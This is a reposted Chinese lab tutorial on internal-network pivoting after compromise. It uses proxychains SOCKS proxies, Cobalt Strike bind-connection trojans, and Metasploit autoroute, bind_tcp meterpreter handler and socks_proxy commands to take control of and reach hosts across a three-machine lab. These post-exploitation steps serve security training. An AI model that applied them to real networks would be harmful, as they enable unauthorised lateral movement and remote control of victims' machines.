第124天:内网安全-代理 Sockets协议&路由不出网&后渗透通讯&CS-MSF 控制上线
目录
案例一:网络通讯&控制上线--CS-路由添加&节点建立&协议生成&正反连接
案例二:网络通讯&控制上线--MSF-路由添加&节点建立&协议生成&正反连接
思维导图
环境配置
这里由于系统内存问题我只设置三台主机,kali充当外网主机
win2019
网卡设置
ip地址
win2008
网卡设置
ip地址
win7网卡设置
ip
确保主机两两之间可以互相ping通
kali ping win2019
win2019 ping win2008
win2008 ping win7
不用来回ping因为ping是相互的,有来有回
案例一:网络通讯&控制上线--CS-路由添加&节点建立&协议生成&正反连接
首先先生成木马在让win2019进行上线
需要设置sockets代理让2019转发一个端口给kali,kali通过代理工具连接这个端口来进行win2008的控制
设置sockets连接
kali设置代理规则,工具为proxychains4为kali自带的,这里是因为我是kali系统,如果是windows,建议使用Proxifier,图形化界面便于操作
工具使用教程
安装完成后,ProxyChains的配置文件通常位于/etc/proxychains.conf或/etc/proxychains4.conf。你需要编辑这个文件来添加你的代理服务器信息。
打开配置文件:
bash
sudo nano /etc/proxychains4.conf # 假设你安装了proxychains4
# 或者sudo nano /etc/proxychains.conf
在文件的末尾找到[ProxyList]部分,并添加你的代理服务器信息。格式通常为:
协议类型 代理服务器IP地址 端口号 [用户名 密码]
例如,如果你有一个SOCKS5代理,IP地址为123.123.123.123,端口号为1080,则添加如下行:
socks5 123.123.123.123 1080
如果需要用户名和密码进行身份验证,则添加相应的用户名和密码:
socks5 123.123.123.123 1080 用户名 密码
保存并关闭配置文件。
三、使用ProxyChains
配置完成后,你就可以通过ProxyChains来使用代理服务器了。ProxyChains的使用非常简单,只需在要运行的命令前加上proxychains4(或proxychains,取决于你安装的版本)即可。
例如,如果你想通过代理服务器访问Google,可以使用curl命令:
bash
proxychains4 curl https://www.google.com
如果没有proxychains4需要自己进行安装,更改/etc/proxychains4.conf文件
因为刚才socket连接为socks4所以这里设置时也需设置为socks4
配置规则
socks4/5 ip 端口
利用 proxychains4 curl win2008IP地址 访问这个地址的网页:启动了phpstudy,可以成功访问了
这里访问页面可以访问成功但是ping不通,个人理解是通过win2019开的口子,能与win2008建立通讯,http不需要建立持久的连接,连接之后返回数据断开即可,通过win2019把数据反回来,而ping虽然数据包可以发送出去,但是在win2008并未设置到kali的路由不知道往哪里发送所以会卡住
现在需要通过cs中2019正向连接win2008因为win2008无法与kali建立连接,只能与win2019连接
操作方法
生成一个新的正向连接的监听器和木马
生成新的后门需要选用加s的模块
上传后门并且执行,因为需要正向连接所以需要win2019输入
connect win2008ip 木马端口
win2008成功上线
连接win7同样的木马直接上传运行,通过win2008连接
连接完成后拓扑图结构
现在再试一下给通过win2008给kali添加win7的节点路由,以此来访问win7的页面
添加节点
添加代理
访问20.20.20.2(iis)
案例二:网络通讯&控制上线--MSF-路由添加&节点建立&协议生成&正反连接
这里我直接先利用msf全部控制,再弄路由添加建立节点来访问页面
首先生成木马,开启监听
然后执行木马上线win2019
msf虽然也是通过win2019正向连接,但是不是通过2019会话进行的,是通过win2019生成路由,让kali直接用msf进行连接的,
通过win2019添加路由
run autoroute -p
run post/multi/manage/autoroute
把会话放入后台
使用正向连接模块,进行连接,这里端口需设置为lport,不能与会话一端口一致
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 10.10.10.2
set lport 3333
run
生成正向连接木马
上传,msf使用正向连接模块
再以win2008生成路由
把会话放入后台
继续上传刚才的木马进行正向连接
这个时候如果是msf与他建立了完整的连接,如果需要kali主机与他们建立连接,则需要通过socket连接生成节点,通过代理连接这个节点以此访问,代理端口为1111
use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 1111
run
配置代理,msf-socks默认为socks5
这里不同于cs的是设置一个节点就可以访问所有可以互相访问的主机
访问win2008,phpstudy
访问win7-iis
如果是windows系统的话可以使用更为方便的图形化工具Proxifier
直接设置代理所有
原文地址:https://blog.csdn.net/weixin_71529930/article/details/140629630
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!